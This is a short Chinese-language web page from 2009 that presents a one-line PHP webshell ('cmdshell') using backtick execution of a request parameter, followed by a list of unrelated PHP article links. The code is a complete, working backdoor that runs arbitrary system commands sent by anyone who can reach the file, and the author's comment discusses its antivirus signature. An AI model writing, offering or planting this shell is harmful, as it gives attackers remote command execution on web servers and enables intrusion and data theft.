php一句话cmdshell新型 (非一句话木马)
更新时间:2009年04月18日 12:04:17 作者:
php运行时如果遇见字符``(键盘上~符号的下档键)总会尝试着执行``里面包含的命令,并返回命令执行的结果(string类型);
复制代码 代码如下:
<?php
/*一个新型的php一句话cmdshell(非一句话木马)
//原理:php运行时如果遇见字符``(键盘上~符号的下档键)总会尝试着执行``里面包含的命令,并返回命令执行的结果(string类型);
//局限性:特征码比较明显,``符号在php中很少用到,杀毒软件很容易以此为特征码扫描到并警报;``里面不能执行php代码;
//write by skyfire
*/
echo `$_REQUEST[id]`;
?>
相关文章
本篇文章是对php中过滤html字符串,防止SQL注入的方法进行了详细的分析介绍,需要的朋友参考下2013-07-07
PHP中的随机性,你觉得自己幸运吗?2016-01-01
php返回文件扩展名的函数 格式化变量php重定向网页等2008-09-09
Laravel的下载以及使用composer来安装debugbar扩展包图文教程
这篇文章主要介绍了Laravel的下载以及使用composer来安装debugbar扩展包图文教程,图文讲解的比较清晰,有不太会的同学可以研究下2021-01-01
这篇文章主要介绍了PHP的反射动态获取类方法、属性、参数操作,结合实例形式分析了PHP反射的功能、原理及基于反射动态获取类方法、属性、参数相关操作技巧,需要的朋友可以参考下2020-03-03
PHP面向对象程序设计重载(overloading)操作详解
这篇文章主要介绍了PHP面向对象程序设计重载(overloading)操作,结合实例形式详细分析了php面向对象程序设计重载原理、实现方法及相关操作技巧,需要的朋友可以参考下2019-06-06
PHP实现获取毫秒时间戳的方法【使用microtime()函数】
这篇文章主要介绍了PHP实现获取毫秒时间戳的方法,结合实例形式分析了php使用microtime()函数获取、转换毫秒级时间戳的相关操作技巧,需要的朋友可以参考下2019-03-03
这篇文章主要介绍了php异常处理方法,实例汇总了常见的php异常处理技巧,非常具有实用价值,需要的朋友可以参考下2015-06-06
下面小编就为大家带来一篇使用php自动备份数据库表的实现方法。小编觉得挺不错的,现在就分享给大家,也给大家做个参考。一起跟随小编过来看看吧2017-07-07
这篇文章主要介绍了PHP的Yii框架中YiiBase入口类的扩展写法示例,同时详细讲解了import和autoload这两个YiiBase中的重要方法,需要的朋友可以参考下2016-03-03
最新评论